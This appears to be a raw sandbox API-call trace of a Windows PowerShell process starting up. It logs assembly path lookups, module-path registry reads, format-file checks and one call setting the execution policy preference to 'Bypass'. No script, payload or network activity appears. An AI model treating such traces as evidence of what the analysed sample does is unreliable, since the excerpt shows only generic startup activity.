	[0108.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0108.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.693] GetConsoleWindow () returned 0x60230
	[0136.696] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.977] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0136.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.977] CoTaskMemFree (pv=0x2158c0) 
	[0137.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.925] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0141.925] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.925] CoTaskMemFree (pv=0x2158c0) 
	[0141.927] CoTaskMemAlloc (cb=0xcc) returned 0x1b8ff6e0
	[0141.927] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8ff6e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.927] CoTaskMemFree (pv=0x1b8ff6e0) 
	[0141.927] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d818 | out: phkResult=0x13d818*=0x1cc) returned 0x0
	[0141.927] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13d79c, lpData=0x0, lpcbData=0x13d798*=0x0 | out: lpType=0x13d79c*=0x2, lpData=0x0, lpcbData=0x13d798*=0x6c) returned 0x0
	[0141.927] CoTaskMemAlloc (cb=0x70) returned 0x1ff100
	[0141.927] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13d76c, lpData=0x1ff100, lpcbData=0x13d768*=0x6c | out: lpType=0x13d76c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x13d768*=0x6c) returned 0x0
	[0141.927] CoTaskMemFree (pv=0x1ff100) 
	[0141.927] CoTaskMemAlloc (cb=0xcc) returned 0x1b8ff6e0
	[0141.927] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8ff6e0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.927] CoTaskMemFree (pv=0x1b8ff6e0) 
	[0141.927] CoTaskMemAlloc (cb=0xcc) returned 0x1b8ff6e0
	[0141.927] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8ff6e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.927] CoTaskMemFree (pv=0x1b8ff6e0) 
	[0141.931] RegCloseKey (hKey=0x1cc) returned 0x0
	[0141.931] CoTaskMemAlloc (cb=0xcc) returned 0x1b8ff6e0
	[0141.931] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8ff6e0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.932] CoTaskMemFree (pv=0x1b8ff6e0) 
	[0141.932] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d818 | out: phkResult=0x13d818*=0x1cc) returned 0x0
	[0141.932] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13d79c, lpData=0x0, lpcbData=0x13d798*=0x0 | out: lpType=0x13d79c*=0x0, lpData=0x0, lpcbData=0x13d798*=0x0) returned 0x2
	[0141.932] RegCloseKey (hKey=0x1cc) returned 0x0
	[0145.715] CoTaskMemAlloc (cb=0x20c) returned 0x1b8fb240
	[0145.715] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8fb240 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.310] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0146.311] GetFileType (hFile=0x330) returned 0x1
	[0146.311] SetErrorMode (uMode=0x1) returned 0x1
	[0146.311] GetFileType (hFile=0x330) returned 0x1
	[0148.115] GetSystemInfo (in: lpSystemInfo=0x13c0b0 | out: lpSystemInfo=0x13c0b0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.116] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.470] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.726] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.727] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.728] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.729] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.729] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.730] VirtualQuery (in: lpAddress=0x13c160, lpBuffer=0x13d020, dwLength=0x30 | out: lpBuffer=0x13d020*(BaseAddress=0x13c000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.481] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0159.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.482] CoTaskMemFree (pv=0x2158c0) 
	[0159.805] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d618 | out: phkResult=0x13d618*=0x158) returned 0x0
	[0159.806] RegQueryValueExW (in: hKey=0x158, lpValueName="path", lpReserved=0x0, lpType=0x13d62c, lpData=0x0, lpcbData=0x13d628*=0x0 | out: lpType=0x13d62c*=0x1, lpData=0x0, lpcbData=0x13d628*=0x74) returned 0x0
	[0159.806] RegQueryValueExW (in: hKey=0x158, lpValueName="path", lpReserved=0x0, lpType=0x13d59c, lpData=0x0, lpcbData=0x13d598*=0x0 | out: lpType=0x13d59c*=0x1, lpData=0x0, lpcbData=0x13d598*=0x74) returned 0x0
	[0159.806] CoTaskMemAlloc (cb=0x78) returned 0x1ff100
	[0159.806] RegQueryValueExW (in: hKey=0x158, lpValueName="path", lpReserved=0x0, lpType=0x13d56c, lpData=0x1ff100, lpcbData=0x13d568*=0x74 | out: lpType=0x13d56c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x13d568*=0x74) returned 0x0
	[0159.806] CoTaskMemFree (pv=0x1ff100) 
	[0159.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0159.806] SetErrorMode (uMode=0x1) returned 0x1
	[0159.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0159.807] SetErrorMode (uMode=0x1) returned 0x1
	[0159.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.808] SetErrorMode (uMode=0x1) returned 0x1
	[0159.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0159.809] SetErrorMode (uMode=0x1) returned 0x1
	[0159.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.809] SetErrorMode (uMode=0x1) returned 0x1
	[0159.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.875] SetErrorMode (uMode=0x1) returned 0x1
	[0159.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.875] SetErrorMode (uMode=0x1) returned 0x1
	[0159.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13d4f0 | out: lpFileInformation=0x13d4f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.876] SetErrorMode (uMode=0x1) returned 0x1
	[0159.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.876] SetErrorMode (uMode=0x1) returned 0x1
